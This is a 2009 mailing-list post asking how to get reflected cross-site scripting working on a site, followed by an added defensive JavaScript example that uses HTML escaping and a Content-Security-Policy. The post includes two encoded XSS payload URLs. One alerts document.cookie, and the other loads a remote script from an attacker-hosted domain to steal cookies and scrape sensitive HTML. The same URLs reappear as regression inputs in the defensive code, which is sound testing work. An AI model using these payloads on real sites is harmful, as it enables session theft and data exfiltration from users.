[BNM] XSS testing

Jason Bailey j.bailey at sussex.ac.uk
Wed May 13 16:17:04 BST 2009


Hi
I'm trying to hack a test/dev site (honest) and have not quite got this 
cross-site scripting stuff working. Any tips?

I've got:
document.location = "http://mywebsite.com/apage.php?variable=%3Cscript%3Ealert(document.cookie);%3C/script%3E";

where mywebsite is the actual site I'm trying to hack and not the 
attacking/remote script site.

This works and I guess I could expand on this but was trying...

     document.location = "http://mywebsite.com/apage.php?variable=%3Cscript src='http://www.myhackycode.com/hackscript.js' %3E %3C/script%3E";

where myhackycode is the remote site hosting the JS
and I'd want to put the document.cookie stuff into hackscript.js. I'm 
actually after something else but this seems like a good test. I'm actually 
trying to scrape some HTML which could contain sensitive information.

So I've put the above in a bit of HTML and where the JavaScript is in the 
URL it works. But in the src=... then nothing. Is this unlikely to work? 
Have I got to create an inline JavaScript function to call the remote JS?

Or do I just stick all my code between the <script> tags?

Jason



-- 
Jason Bailey
IT Services
University of Sussex
http://www.sussex.ac.uk/USIS/phone/details.php?id=17011
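
From the defending side, the two URLs quoted in the message make useful regression inputs for whatever page reflects `variable`. The following is an added example, not part of the original post or the site's code: `renderApage()` is a hypothetical JavaScript stand-in for the server-side handler of apage.php, and the output escaping and Content-Security-Policy header are assumptions about how such a page could be hardened.

```javascript
// Added defensive example; not code from the original post or the site.

// HTML-escape a value for insertion into element content or a quoted attribute.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical stand-in for apage.php: reflects the "variable" query parameter.
function renderApage(requestUrl) {
  // searchParams percent-decodes %3C, %3E and friends, as the server would.
  const params = new URL(requestUrl).searchParams;
  const variable = params.get('variable') ?? '';
  return {
    headers: {
      'Content-Type': 'text/html; charset=utf-8',
      // Second layer: no inline scripts, scripts only from the page's own origin.
      'Content-Security-Policy': "default-src 'self'; script-src 'self'; object-src 'none'",
    },
    // The reflected value is escaped at the point of output.
    body: `<!doctype html><title>apage</title><p>You sent: ${escapeHtml(variable)}</p>`,
  };
}

// True if the body contains markup a browser would parse as a script element.
function containsScriptTag(body) {
  return /<\s*script\b/i.test(body);
}

// The two URLs quoted in the message, used as regression inputs.
const REPORTED_URLS = [
  'http://mywebsite.com/apage.php?variable=%3Cscript%3Ealert(document.cookie);%3C/script%3E',
  "http://mywebsite.com/apage.php?variable=%3Cscript src='http://www.myhackycode.com/hackscript.js' %3E %3C/script%3E",
];

// Render each reported URL and report whether a script element survived.
function checkReportedUrls() {
  return REPORTED_URLS.map((u) => containsScriptTag(renderApage(u).body));
}

console.log(checkReportedUrls()); // [ false, false ]
```

With escaping in place both inputs are rendered as visible text, and the header means the browser refuses inline or third-party scripts even if an escaping call is missed elsewhere on the page.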

